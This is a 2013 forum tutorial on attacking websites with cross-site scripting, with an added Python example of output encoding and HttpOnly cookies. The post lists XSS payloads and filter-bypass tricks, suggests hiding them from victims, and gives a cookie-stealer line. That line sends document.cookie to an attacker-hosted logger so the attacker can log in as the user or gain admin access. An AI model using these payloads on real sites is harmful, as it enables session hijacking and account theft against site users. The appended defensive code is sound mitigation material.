

Tutorial: Basic XSS, cookie logger and XSS shell
Basic XSS, cookie logger and XSS shell #1
[Image: RIFMn.jpg]

XSS tutorial
Methodology
XSS stands for cross-site scripting; basically this is injecting a script (usually JavaScript) into the site. There are two types of XSS:

Persistent XSS
This is when the script is stored on the page after reload, for example a comment form. This attack can be used for injecting a shell into the site.
Non-persistent XSS
This is when the script isn't stored on the page, for example a search box. This attack can be used for setting up a cookie logger, phishing or setting up a JDB.
Before you start exploiting XSS vulnerabilities you should know a little JavaScript. You can read my tutorials on basic JavaScript; since there wasn't interest in them I haven't continued writing them.

Now you should test every place where you can write text on the site: search box, comment box, chat box, everything. You can use this cheat sheet because it's easier:
Code:
http://www.xenuser.org/xss-cheat-sheet/
Also, now it's the moment to talk about bypassing filters.
Using String.fromCharCode()
This is an easy technique, very popular these days. Basically String.fromCharCode() is a JavaScript function that converts ASCII values to characters.
<script>alert('XSS');</script> will look like:
Code:
<script>String.fromCharCode(97,108,101,114,116,40,39,88,83,83,41,59)</script>
You can use online tools to do this
Code:
https://www.martineve.com/2007/05/23/string-fromcharcode-encoder/
or HackBar, which is a Firefox add-on.
HEX encoding is a similar technique; you encrypt text to HEX =D.
Here is an example of <script>alert('XSS');</script>
Code:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%5c%27%58%53%53%5c%27%29%3b%3c%2f%73%63%72%69%70%74%3e%20
Also you can use it to scam victims, because if they see <script>....... in the URL it will look suspicious.
Obfuscation is another popular technique.
Here is how <script>alert('XSS');</script> will look:
Code:
<sCrIpT>aLeRt('XSS');</sCrIpT>
Sometimes a closing tag will bypass filters; basically this is adding a close tag before the script:
Code:
"><script>alert('XSS');</script>
Sometimes < > may be filtered, but you can use this script:
Code:
";alert(0);"
Cookie stealer
Setting up a cookie stealer is one of the best things you can do with non-persistent XSS; basically this is a script that steals the cookies of the user, and you can use them to log in as this user. You can use this for SE-ing the admin and getting admin access.

First you need to make a little PHP script, link:
Code:
http://pastebin.com/6pThnUU7
I have explained the code; it's easily understandable.
Now you have to upload it somewhere, for example http://www.cwahi.net/
When you have done this you should inject this script on the vulnerable page:
Code:
<script>document.location="www.site.com/cookie-logger.php?c=" + document.cookie</script>
You can apply all the filter bypassing techniques here.
XSS Shell demo (SecurityTube)
I don't have any idea if phishing is illicit here, so I won't write about it now; if there is interest in it I will make a short tutorial.

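As an added defensive example (not part of Synchro's post, and not the PHP logger it links), the Python below models a search page that echoes the query into an HTML attribute. It runs the post's own payload shapes (plain, mixed-case, attribute break-out and percent-encoded) through a naive blacklist filter and through proper output encoding, and checks structurally whether the markup was altered. It also shows the Set-Cookie flags that blunt a document.cookie logger. The template string, the filter and the session cookie name are assumptions made for the demonstration.

```python
import html
from urllib.parse import unquote

# Constructed inputs: the payload shapes quoted in the post above
# (plain, case-varied, attribute break-out and percent-encoded).
RAW_QUERIES = {
    "plain": "<script>alert('XSS');</script>",
    "case_variation": "<sCrIpT>aLeRt('XSS');</sCrIpT>",
    "attribute_breakout": "\"><script>alert('XSS');</script>",
    "percent_encoded": (
        "%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%5c%27%58%53%53"
        "%5c%27%29%3b%3c%2f%73%63%72%69%70%74%3e%20"
    ),
}

# Hypothetical search page: the query is echoed back inside an attribute.
TEMPLATE = '<input type="text" value="{}">'


def naive_blacklist_filter(value: str) -> str:
    """A blacklist of the kind the post's tricks defeat: case-sensitive,
    string-literal, and unaware of the attribute context it protects."""
    return value.replace("<script>", "").replace("</script>", "")


def render_naive(raw_query: str) -> str:
    """Vulnerable pipeline: filter the raw query string, then URL-decode
    it, then paste it into HTML with no output encoding at all."""
    filtered = naive_blacklist_filter(raw_query)
    return TEMPLATE.format(unquote(filtered))


def render_safe(raw_query: str) -> str:
    """Hardened pipeline: canonicalize (URL-decode) first, then encode for
    the HTML attribute context at the moment of output. html.escape with
    quote=True turns < > & " ' into entities, so the value can never close
    the attribute or open a tag, whatever casing or encoding was used."""
    return TEMPLATE.format(html.escape(unquote(raw_query), quote=True))


def injected_markup(rendered: str) -> bool:
    """Structural check: a correctly rendered input has exactly one '<'
    and four '"' (two around type, two around value). Any other count
    means user data changed the markup rather than staying inside it."""
    return rendered.count("<") != 1 or rendered.count('"') != 4


def evaluate(render) -> dict:
    """Map each sample query to True if it alters the markup under `render`."""
    return {name: injected_markup(render(q)) for name, q in RAW_QUERIES.items()}


def session_cookie_header(session_id: str) -> str:
    """Defence in depth for the cookie-logger section: HttpOnly keeps the
    session cookie out of document.cookie, so a script that ships
    document.cookie elsewhere gets nothing useful; Secure and SameSite
    limit where the browser will send it at all. Cookie name is assumed."""
    return f"Set-Cookie: session={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    for name, verdict in evaluate(render_naive).items():
        print(f"naive  {name:20s} injected={verdict}")
    for name, verdict in evaluate(render_safe).items():
        print(f"safe   {name:20s} injected={verdict}")
    print(session_cookie_header("constructed-session-id"))
```

The naive pipeline stops only the literal payload: mixed case slips past the string match, the leading `">` closes the attribute before any tag check matters, and the percent-encoded form is filtered before it is decoded. Output encoding at the sink needs no blacklist and treats every variant the same, which is why it, together with HttpOnly on the session cookie, is the fix rather than a longer filter list.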
Basic XSS, cookie logger and XSS shell - by Synchro - 01-21-2013, 06:21 PM